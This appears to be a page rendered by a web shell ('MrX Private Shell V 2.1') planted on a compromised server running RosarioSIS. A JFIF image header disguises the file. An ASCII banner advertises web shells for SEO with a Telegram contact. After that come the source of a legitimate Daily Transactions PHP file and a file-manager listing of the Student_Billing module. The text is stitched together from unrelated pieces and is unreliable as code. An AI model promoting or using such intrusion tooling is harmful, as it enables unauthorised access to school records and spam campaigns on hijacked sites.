����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Daily Transactions
*
* @since 8.0 Merge Daily Transactions & Daily Totals programs
*
* @package RosarioSIS
* @subpackage modules
*/
DrawHeader( ProgramTitle() );
$_REQUEST['program'] = issetVal( $_REQUEST['program'], '' );
if ( $_REQUEST['program'] === 'totals'
&& User( 'PROFILE' ) === 'admin' )
{
require_once 'modules/Student_Billing/includes/DailyTotals.php';
}
else
{
require_once 'modules/Student_Billing/includes/DailyTransactions.php';
}
/**
* Program Menu
*
* Local function
*
* @since 8.0
* @since 10.9 Temporary AllowEdit so SelectInput() is displayed to everyone
*
* @param string $program Program: transactions|totals.
*
* @return string Select Program input.
*/
function _programMenu( $program )
{
global $_ROSARIO;
if ( ! AllowEdit() )
{
$_ROSARIO['allow_edit'] = true;
$allow_edit_tmp = true;
}
$link = PreparePHP_SELF(
[],
[ 'program' ]
) . '&program=';
$menu = SelectInput(
$program,
'program',
'',
[
'transactions' => _( 'Daily Transactions' ),
'totals' => _( 'Daily Totals' ),
],
false,
'onchange="' . AttrEscape( 'ajaxLink(' . json_encode( $link ) . ' + this.value);' ) . '" autocomplete="off"',
false
);
if ( ! empty( $allow_edit_tmp ) )
{
$_ROSARIO['allow_edit'] = false;
}
return $menu;
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| includes | Folder | 0755 |
|
|
| DailyTransactions.php | File | 1.28 KB | 0644 |
|
| MassAssignFees.php | File | 2.61 KB | 0644 |
|
| MassAssignPayments.php | File | 2.6 KB | 0644 |
|
| Menu.php | File | 1.39 KB | 0644 |
|
| Statements.php | File | 2.06 KB | 0644 |
|
| StudentBalances.php | File | 1.9 KB | 0644 |
|
| StudentFees.php | File | 7.31 KB | 0644 |
|
| StudentPayments.php | File | 7.59 KB | 0644 |
|
| functions.inc.php | File | 9.53 KB | 0644 |
|